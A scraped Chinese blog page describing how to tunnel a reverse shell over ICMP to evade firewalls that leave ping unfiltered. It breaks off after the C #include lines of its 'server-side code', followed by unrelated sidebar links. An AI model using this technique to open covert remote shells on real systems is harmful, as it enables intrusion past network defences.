当前位置:网站首页>利用ICMP协议反弹shell
利用ICMP协议反弹shell
2022-07-20 19:32:00 【千里:)】
简述
网络管理员通常使用各种各样的防火墙,以拦截各类渗透测试动作,如某防火墙允许已知的机器流量在端口和服务(入口过滤),并拥有强大的出口访问控制列表的设置。然而很多时候,为了方便运维管理,在各种安全策略中,ICMP协议通常是不会过滤的,通俗点说就是不会禁PING。
ICMP(Internet Control Message Protocol)Internet控制报文协议,是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。如果在目标主机建立一个shell的管道,通过ICMP数据部分来传输协议即可实现远控过程中所需的数据交互。
服务端代码
Windows服务端:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip.h>
#include <string.h>
#include <unistd.h>
#incl边栏推荐
猜你喜欢
Detailed explanation of zero length array in C language (2)
Safe day 2022 China large scale agile conference will be held on November 5
对于开发而言,用户体验才是最终的王道(性能优化篇)
Activity registration | expose the insider of Apache Doris data Lake analysis technology? Rare earth Developers Conference free registration!
助力企业数字化升级,火山引擎发布云上增长解决方案
Set shell script to start automatically
C#中缓存的使用
C# 同步 异步 回调 状态机 async await Demo
内网渗透学习(一)内网入门基础
更智能!AIRIOT加速煤炭行业节能减排升级
随机推荐
重鏈剖分鏈加與極值
C# 图像模板匹配并标注
Easygbs platform setup tips: how to hide the platform web page from being accessed?
STL 笔记(十四):函数对象
《PyTorch深度学习实践》学习笔记:循环神经网络(高级篇)
Postman 最被低估的功能,90%的人不知道!
The computer suddenly shows that there is only C disk, and other disks do not show ---- solution (very simple)
可行性研究报告应包括的内容
The past, present and future of JVM
MySQL---three 多表查询与事务的操作
Uses of mysqladmin, mysqldump, mysqlslap, mysqlshow, mysqlcheck client programs
助力企业数字化升级,火山引擎发布云上增长解决方案
哎,系统分析师下午没过
Hisilicon AI chip (hi35xx): image JPG to BGR upgrade
架构训练营模块七作业
Contents to be included in the feasibility study report
C# 本地函数与yield语句
PCL calculates point cloud roughness
MySQL的安装
jvm的启动过程